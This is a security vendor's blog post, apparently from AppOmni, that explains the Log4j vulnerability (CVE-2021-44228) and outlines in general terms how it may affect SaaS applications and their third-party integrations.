How Log4j May Impact Your SaaS and 3rd-Party Apps - and What You Can Do
Log4j is a critical vulnerability in a widely-used software that can have far-reaching and costly impacts. Organizations of all sizes, from small online retailers to the most recognized brands to government agencies, are impacted. One of AppOmni’s core values is to build trust with transparency, which includes offering information and perspective about security issues. Read on for our take on Log4j and what organizations can do to protect their systems.
What is Log4j?
Log4j2 is an open-source, Java-based logging framework developed by collaborators of the Apache Software Foundation. It’s popular with commercial software developers and runs on all major platforms, including Windows, Linux, and macOS. A critical vulnerability (CVE-2021-44228) impacting the Log4j2 utility was reported between late November and early December 2021. The flaw means attackers can take control of any system using the software, and the vulnerability is being exploited by bad actors worldwide.
Are SaaS applications impacted?
Many technologies are impacted including firewalls, servers, video conferencing platforms, and more. SaaS applications are also impacted. Many SaaS vendors have Log4j as part of their platform, and are working to mitigate impacts to their customers. Visit CISA for a list of applications with their Log4j vulnerability status along with information on vendor updates.
Are third-party apps affected?
Third-party integrations into SaaS applications are also vulnerable. Many of these third-party solutions can read, write, and delete sensitive data. They can also access user groups, workspaces, or multiple areas in the corporate network. Many issues can arise with third-party apps, including uncertainty around knowing which apps are approved, what permissions an app has, and who can install an app. It’s also often unknown what users are doing with the data accessed by apps.
What are the potential vulnerabilities to SaaS applications?
There are a few potential Log4j vulnerabilities for SaaS applications:
- Nefarious actors could use Log4j to change access and/or security settings within SaaS applications. For example, by turning off encryption or giving someone access to data that they shouldn’t have.
- Data, including usernames and passwords, could be exported, deleted, or otherwise compromised.
- Data can also be compromised through third-party apps such as Data Loader in Salesforce, or other apps installed through application-specific marketplaces.
- And other Log4j-related vulnerabilities continue to be discovered.